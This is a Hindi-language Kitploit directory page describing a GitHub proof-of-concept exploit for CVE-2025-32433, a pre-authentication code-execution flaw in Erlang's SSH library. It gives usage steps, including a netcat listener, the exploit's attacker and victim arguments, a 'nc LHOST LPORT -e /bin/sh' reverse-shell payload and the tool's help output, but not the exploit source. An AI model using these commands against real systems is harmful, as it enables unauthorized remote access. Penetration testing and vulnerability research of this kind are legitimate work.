Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-3243 — CVE-2025-32433 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट शोषण, जो एर्लांग के SSH लाइब्रेरी में एक महत्वपूर्ण कमजोरी है, जो गलत प्रारूप वाले SSH_MSG_CHANNEL_REQUEST पैकेटों के माध्यम से पूर्व-प्रमाणित कोड निष्पादन की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/tenebrae93/cve-2025-3243
पेलोड जनरेशनभेद्यता विश्लेषणशोषणशेलकोडपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubtenebrae93/cve-2025-3243

CVE-2025-3243

CVE-2025-32433 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट शोषण, जो एर्लांग के SSH लाइब्रेरी में एक महत्वपूर्ण कमजोरी है, जो गलत प्रारूप वाले SSH_MSG_CHANNEL_REQUEST पैकेटों के माध्यम से पूर्व-प्रमाणित कोड निष्पादन की अनुमति देता है।

रिपॉजिटरी देखें
7111 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-32433 Erlang SSH लाइब्रेरी शोषण

CVE-2025-32433 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट शोषण, एरलैंग की SSH लाइब्रेरी में एक गंभीर कमज़ोरी जो दुर्भावनापूर्ण SSH_MSG_CHANNEL_REQUEST पैकेट के माध्यम से पूर्व-प्रमाणित कोड निष्पादन की अनुमति देती है।


विशेषताएं

  • मूल शोषण मैथ्यू कीली द्वारा
  • अपडेटेड संस्करण टायलर रैम्सबे द्वारा:
    • LHOST, LPORT, RHOST, और RPORT के लिए कमांड-लाइन तर्क
    • argparse के माध्यम से अंतर्निहित सहायता और उपयोग
    • os:cmd("nc LHOST LPORT -e /bin/sh") का उपयोग करते हुए एरलैंग-शैली रिवर्स शेल पेलोड
    • प्रत्येक चरण के लिए साफ फ़ंक्शन विघटन और स्थिति लॉगिंग

पूर्वापेक्षाएँ

  • Python 3
  • आपकी आक्रमण मशीन पर एक कार्यशील nc (Netcat) लिसनर
  • लक्ष्य SSH सेवा (डिफ़ॉल्ट पोर्ट 22) तक नेटवर्क पहुंच

उपयोग

  1. अपना लिसनर शुरू करें आक्रमण बॉक्स पर:

    root@kitploit:~
    nc -lvnp 4444
    
  2. शोषण चलाएं:

    root@kitploit:~
    python3 CVE-2025-32433.py -lh [Attacker-IP] -lp [Attacker-Port] -rh [Victim-IP] -rp [Victim-Port]
    
  3. शेल का इंतज़ार करें जो आपके लिसनर से वापस कनेक्ट हो।

सहायता मेनू

root@kitploit:~
$ python3 CVE-2025-32433.py -h
usage: CVE-2025-32433.py [-h] -lh LHOST -lp LPORT [-rh RHOST] [-rp RPORT]

Send a pre-auth SSH channel request with an Erlang RCE payload
to get a reverse shell

optional arguments:
  -h, --help            show this help message and exit
  -lh LHOST, --lhost LHOST
                        Local host/IP to receive the reverse shell
  -lp LPORT, --lport LPORT
                        Local port to receive the reverse shell
  -rh RHOST, --rhost RHOST
                        Target SSH server IP (default: 10.10.248.101)
  -rp RPORT, --rport RPORT
                        Target SSH server port (default: 22)

क्रेडिट्स

  • मूल स्क्रिप्ट मैथ्यू कीली द्वारा (MattKeeley)
  • यह अपडेटेड संस्करण टायलर रैम्सबे द्वारा

अस्वीकरण

इस कोड का उपयोग केवल उन सिस्टम पर करें जिनके आप मालिक हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है। कमज़ोरियों का अनधिकृत शोषण अवैध और अनैतिक है।

टूल डाउनलोड करें